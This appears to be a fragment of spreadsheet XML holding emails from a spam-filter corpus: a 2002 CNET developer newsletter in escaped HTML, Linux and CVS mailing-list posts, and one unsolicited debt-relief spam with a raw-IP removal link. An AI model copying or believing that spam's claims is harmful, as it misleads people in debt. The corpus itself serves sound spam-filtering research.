 	&lt;TABLE border=0 cellPadding=0 cellSpacing=0 width=430&gt;
 	&lt;TBODY&gt;
 	&lt;TR&gt;&lt;TD bgColor=#ffcc00&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 	&lt;/TBODY&gt;
 	&lt;/TABLE&gt;
 &lt;!-- Leads Module --&gt;
 &lt;!-- /Leads Module --&gt;
 &lt;!--  reviews and features --&gt;
 &lt;TABLE border="0" cellPadding=10 cellSpacing=0 width=430&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;IMG alt="Reviews &amp;amp; Features"
 src="http://www.cnet.com/i/nl/lx/sub_rev.gif" border=0&gt;&lt;BR&gt;
 &lt;IMG height=8 src="http://www.cnet.com/i/nl/rule.gif" width=410 border=0&gt;&lt;BR&gt;
 &lt;font size=-2&gt;From Builder.com&lt;/font&gt;&lt;br /&gt;
 &lt;FONT face=arial,helvetica size=-1&gt;
 &lt;A name=h1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtYMDex7vEMLKlXBDgnVnR" &gt;Six
 MySQL/PHP functions to streamline development&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;
 Code reuse is one of the keys to increasing developer
      productivity. This article looks at several handy functions
      you can use to save time when building applications using
      PHP and MySQL.
 &lt;br /&gt;&lt;br /&gt;
 &lt;img src="http://home.cnet.com/b.gif" height=5 width=1&gt;&lt;br /&gt;
 &lt;FONT face=arial,helvetica size=-1&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=59-y53oIEnthMrDgN1lpW-B_KMqztrR" &gt;Faking
 SOAP principles with familiar techniques&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;
 SOAP is everywhere you turn. But what exactly is it? Take
      this guided tour to gain working knowledge of this emerging
      standard.
 &lt;p /&gt;
 &lt;/font&gt;
 &lt;P&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;!-- End reviews and features --&gt;
 &lt;!-- picks of the week --&gt;
 &lt;IMG alt="Picks of the week"
 src="http://www.cnet.com/i/nl/dl/sub_picks.gif" border=0&gt;&lt;BR&gt;
 &lt;IMG height=8 src="http://www.cnet.com/i/nl/rule.gif" width=410&gt;&lt;BR&gt;
 &lt;FONT size=-2&gt;in ActiveX&lt;/FONT&gt;&lt;BR&gt;
  &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES2bRJmGcQA5K-fxuEL5iR" &gt;FileSystem 1.2&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Having problems wrangling the Windows File System? The
    FileSystem ActiveX control offers complete access to common
    file information under Windows through three independent
    interfaces. Everything from drive and folder access to file
    I/O operations is available with only a few lines of code.
    Use this control's interfaces to detect media types and
    media insertion, get complete lists of folders and files at
    unlimited folder depth, find out what attributes are set on
    files, and even load logbook files into collections
    automatically. Rope in your files.&lt;P&gt;
  &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lFkYQzCtuoAABMMPZ9FR" &gt;ApSecureX 2.9&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Prevent pirates from copying your software with AppSecureX.
    This control provides a registration system that produces a
    valid serial number customized to the user's machine. When
    the user installs your software, a unique ID number is
    generated for that system. To get the serial number, the
    user must provide you with his installation number. The
    data file created by the application is encrypted
    differently for each system, so even if someone were to
    crack the file, they couldn't use the information on
    another machine. AppSecure can also give your software
    shareware functionality such as number of days left, checking
    to see if the system clock is set back, and so on. AppSecureX
    works with any ActiveX-enabled programming language such as
    Microsoft Visual Basic or Microsoft Visual C++. A demo
    application is included. Lock up your software.&lt;P&gt;
 &lt;FONT size=-2&gt;in Java&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_zabm_zRddCW5CH7esbKR9R" &gt;AppletFile 2.5&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 AppletFile is a set of Java applets that will enhance your
    Web site's file upload and download capabilities. In
    addition to support for SSL, proxy, and authenticated
    uploading, users can upload and download multiple files
    using predefined paths to automate the process as much as
    possible. A scripting language provides for sophisticated
    customization, and the user interface includes support for
    12 different languages. Transfers are faster because the
    applet uses its own compression (AutoZIP). The AutoSYNC
    feature downloads only updated files, and verification of
    file transfer integrity is made possible with built-in
    support for MD5 message digests. AppletFile is based on
    HTTP protocols and is firewall-friendly. This update adds
    Sun's Java Plug-in support for Netscape 6+ browsers and
    shows removable media drives in the browse dialog. Beam up
    your files.&lt;P&gt;
 &lt;FONT size=-2&gt;in Tools &amp;amp; Editors&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEB45ync3FQhaIHsSzky0uR" &gt;PHP Master Editor 2.0&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 Write, edit, and debug PHP scripts and HTML pages with this
    tool. PHP Master Editor includes an internal browser for
    viewing, as well as a debugger for local testing. Basic FTP
    capability is also included. Specifically designed for PHP
    programmers, the program recognizes and formats functions,
    variables, and classes within the code, and features
    customizable code templates. Get code-happy.
 &lt;P&gt;
 &lt;P&gt;
 &lt;!-- top ten --&gt;
 &lt;A name=h2&gt;&lt;IMG height=19 alt="This Week's Top Ten Downloads"
 src="http://www.cnet.com/i/nl/dl/sub_top10.gif"
 width=250&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG height=8
 src="http://www.cnet.com/i/nl/rule.gif"
 width=410&gt;&lt;BR&gt;&lt;/FONT&gt;
 &lt;TABLE cellSpacing=0 cellPadding=4 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD width="6%" height=36&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="39%"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;Most
 Popular Titles&lt;/B&gt;&lt;BR&gt;&lt;FONT size=-2&gt;Week ending July 7
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="13%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&amp;nbsp;&lt;B&gt;Last&lt;BR&gt;&amp;nbsp;&amp;nbsp;Week&lt;/B&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="16%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&amp;nbsp;&lt;B&gt;Weeks&lt;BR&gt;&amp;nbsp;&amp;nbsp;on&amp;nbsp;Chart&lt;/B&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="26%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&amp;nbsp;&lt;B&gt;Downloads&lt;BR&gt;&amp;nbsp;&amp;nbsp;This
 Week&lt;/B&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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
 1&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLx-Q6KWjVZ5znP-FdWuuFR" &gt;Microsoft
 Java Virtual Machine&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 4&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 83&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 12,047&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;
 &lt;TD height=65&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWIvIOdvlmkSWreAgRDc9R" &gt;Microsoft
 Windows Installer (95/98/Me)&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 1&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 83&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 10,817&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt; &lt;TD colSpan=5&gt;&lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;&lt;TR&gt; &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;
 &lt;TD height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 3&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVq7Y6kp64xv3orMjEsaQuR" &gt;Microsoft
 Data Access Components RTM&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 3&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 83&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 9,911&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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4&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8-YNO18Y_XGuwrfzJ6nsR" &gt;Java 2
 Runtime Environment, SE&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 2&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 83&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 9,685&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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5&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=17-agitI5XrfbdnSbRIz4s1RhjGRsZR" &gt;Visual Basic
 6.0 Runtime Module SP5&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 5&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 72&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 8,243&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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6&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0D7XN5_bGc-r7MBvWpjudR" &gt;ActiveX Control Pad
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 8&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 6&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 3,740&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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7&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKImGOrPmMU5CfCkxHB0FrR" &gt;Mozilla (32-bit)
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 7&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 4&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 3,071&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt; &lt;TD colSpan=5&gt;&lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;&lt;TR&gt; &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;
 &lt;TD height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 8&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=56-NwKYInns9Y65Uu3rctPQDwwaMCiR" &gt;Microsoft Windows Installer (Windows NT/2000)&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 9&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 36&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2,411&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;&lt;TD
 height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 9&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6c-SUL3IuPjjWx_rMKKQCL5-NPyEdnR" &gt;Borland C++ Compiler&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 10&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 59&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2,356&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;&lt;TD
 height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 10&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KBrR8vh2ApqfRO9R6BpKcR" &gt;Java 2 Development Kit&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 14&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 83&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2,144&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;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HREF='http://clickthru.online.com/Click?q=96-pjcWrwdzdRody8Z6ZfmfGEsvn8jBSdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdY4hnfweXydit0M-0OvFR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2zC4NcYX41H99K8FZuS9R"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href="http://clickthru.online.com/Click?q=d5-p-viQzL1adB7YEjHCu4jNix1DPuR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4NaEvrN7AwQ4lAUw-5WsR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4e4yyiCiZxrhBm0WHthZR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=15-mYP_IGck_EAqKwaAV-hDEc2lRbuR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=2a-CNuWIrIPI7v5OWqabman8WccrYsR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=3f-4sAEIqMW4q6yBnLHcoh57BymNzZR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e416&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=54-l6HvnFKl72aBaxFPgshG_9W1z9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Problem building lame-3.92-fr5.src.rpm on RH8
</t>
  </si>
  <si>
    <t xml:space="preserve">I can't seem to build this package. It errors out because rpm found 
 files not included in any of the packages. I tried getting them addes 
 (it's the documentation that is being loaded) and was unsuccessful. 
 Anyone get this to work?
 Coy
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: cvs access working?
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_13609133P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Brent Welch &lt;welch@panasas.com&gt;
 &gt; Date:  Fri, 26 Jul 2002 15:00:57 -0700
 &gt;
 &gt; Can anyone access the CVS server for exmh?
 &gt; The last thing I was able to do was try a "cvs commit", but
 &gt; I got an "up-to-date check failed" for a couple files,
 &gt; exmh.CHANGES and lib/msg.tcl, I think, so I then tried "cvs update".
 &gt; I get a password prompt, and then it just hangs.
 &gt; 
 &gt; cat CVS/Root
 &gt; welch@cvs.sourceforge.net:/cvsroot/exmh
 I did a commit on friday and I just did an update right now.
 cat CVS/Root 
 :ext:cwg@cvs.exmh.sourceforge.net:/cvsroot/exmh
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_13609133P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9RFygK9b4h5R0IUIRAvp1AJ4uedoak2We0nGHfzih7g+6TZEI3QCfccvt
 GLM1U8Y3z4JPyzUYNHLE0Zc=
 =6M2X
 -----END PGP SIGNATURE-----
 --==_Exmh_13609133P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: California challenges US stem cell rules
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8167824,1440/
 Date: Not supplied
 It will be the only US state where medical researchers can use public funds to 
 create embryos and extract stem cells
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] O.T. Habeus -- Why?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Wednesday, August 28, 2002, at 01:50  PM, Robin Lynn Frank wrote:
 &gt; And if a spammer forges headers???
 Header forgeries are trivially easy to detect. The main way that 
 spammers hide their originating IPs is not by forging headers, 
 but by sending through open proxy servers.  It used to be that 
 spammers used open relay mailserver, but these often betray the 
 originating IP, and the proliferation of open relay blocklists, 
 and the introduction of port 25 blocking on the part of many 
 ISPs make open relays unattractive to spammers.
 One would think, that the combination of a forged Habeas-SWE, 
 and mail sent through an anonymizing open proxy would be a 
 fairly good indication of spam.  Tracking a spammer to his 
 meatspace location is not as difficult as you might think, once 
 you have legal recourse to subpoena records.
 --B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</si>
  <si>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Get Debts Off Your Back    -      Time:5:38:50 AM
</t>
  </si>
  <si>
    <t xml:space="preserve">Are creditors hassling you about your debts? 
 We are a non-profit organization that can help you 
 reduce your monthly payments.  Our consultation is FREE..
 Our debt counselors will work out an easy and convenient method of resolving your debts without bankruptcy.
 Contact us NOW and take a big load off your mind. - http://debt-freee.com/9i/?sid=106 (scroll down for remove info)
 To be removed from our database, click here - http://195.235.97.200/personal9/reserve3/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: POTW (Was Re: [ILUG] mirroring on a running system)
</t>
  </si>
  <si>
    <t xml:space="preserve">Takers galore possibly (me inclusive). Especially when the subject
 is more on-topic :-)
 Gary.
 On Wed, Aug 14, 2002 at 10:08:03AM +0100, Wynne, Conor wrote:
 &gt; All right, can't get pissed though as its a week-day. If we were to do
 &gt; it in Lucan, that would be another story ;--)
 &gt; 
 &gt; Do we have many takers? 
 &gt; 
 &gt; CW
 &gt; 
 &gt; -------------
 &gt; On Wed, Aug 14, 2002 at 09:22:27AM +0100, Wynne, Conor mentioned:
 &gt; &gt; When are we going to have a pint? 
 &gt; 
 &gt;  Tuesday next week. Boars Head, Capel st.
 &gt; 
 &gt; Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Short version:
 T-Mobile Broadband is in the process of wiring every starbucks in the area
 (T1 backhauled to some ~local POP + 802.11) as part of what I'm told is a
 national rollout. The Diesel is close enough to the Elm St starbucks for me
 to get reasonable net throughout most of the cafe. 
 The rumor is that they'll be announcing that they've got boston covered on
 the 21st.  I've heard from at least one source that they're actually going
 to announce a much wider national rollout at that time.  It's not cheap [1], but
 for soemone like me who's running a ~virtual corporation, it's well worth it.
 [1] https://accounts.tmobilebroadband.com/net_offers_promos.htm
 On Thu, Aug 15, 2002 at 04:51:07PM -0400, Luis Villa wrote:
 &gt; On Thu, 2002-08-15 at 16:38, Jesse wrote:
 &gt; &gt; Strata just walked up to me in a cafe in Somerville, MA and
 &gt; &gt; asked me how I was getting net here. And _then_ we figured out 
 &gt; &gt; that we have shared context.
 &gt; 
 &gt; The obvious followup is 'there's a cafe in somerville with net access?'
 &gt; Luis [19 Pitman St.]
 &gt; http://xent.com/mailman/listinfo/fork
 &gt; 
 -- 
 jesse reed vincent -- root@eruditorum.org -- jesse@fsck.com 
 70EBAC90: 2A07 FC22 7DB4 42C1 9D71 0108 41A3 3FB3 70EB AC90
 autoconf is your friend until it mysteriously stops working, at which 
 point it is a snarling wolverine attached to your genitals by its teeth
  (that said, it's better than most of the alternatives)  -- Nathan Mehl
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fwd: Re[2]: AA Meetings the Hottest Place to Meet Women With Big
</t>
  </si>
  <si>
    <t xml:space="preserve">And of course I forget the link that I did find.
 http://www.constitutioncenter.org/sections/news/8b4.asp
 Neither NPR nor the first amendment foundation seem to have the
 article I was looking for declaring the study.
 Even if its half true, its still frightening.
 It makes me want to pass out CATO bibles...
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] removing lilo
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting jac1 (jac1@student.cs.ucc.ie):
 &gt; i recently had to wipe linux from my pc but forgot to restore the original
 &gt; MBR (NT). Anyone know how i can do this? linux is entirely gone and no boot
 &gt; floppy. formatting the entire disk doesn't do it either.
 The easy way is just to install whatever Microsoft or whatever OS you
 have in mind:  It should overwrite the MBR.  Indeed, the problem is
 usually _preventing_ this from happening, as Microsoft Corporation's
 installers seem to forever be overwriting your MBRs when you least wish
 it, without asking your permission.
 -- 
 Cheers,               "We're sorry; you have reached an imaginary number.
 Rick Moen             Please rotate your 'phone ninety degrees and try again."
 rick@linuxmafia.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">At 12:05 PM 10/4/28 -0400, Stephen D. Williams wrote:
 &gt;Date: Wed, 04 Oct 2028 12:05:01 -0400
 &gt;
 &gt;I actually thought of this kind of active chat at AOL (in 1996 I think), 
 &gt;bringing up ads based on what was being discussed and other features.  For 
 &gt;a while, the VP of dev. (now still CTO I think) was really hot on the idea 
 &gt;and they discussed patenting it.  Then they lost interest.  Probably a 
 &gt;good thing.
 [note date: header]
 Can I borrow your time machine, pretty please?
 Udhay
 -- 
 ((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: SoE at UCSC looking for an experienced IT support person
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,
 We're looking for an experienced IT support person in the School of
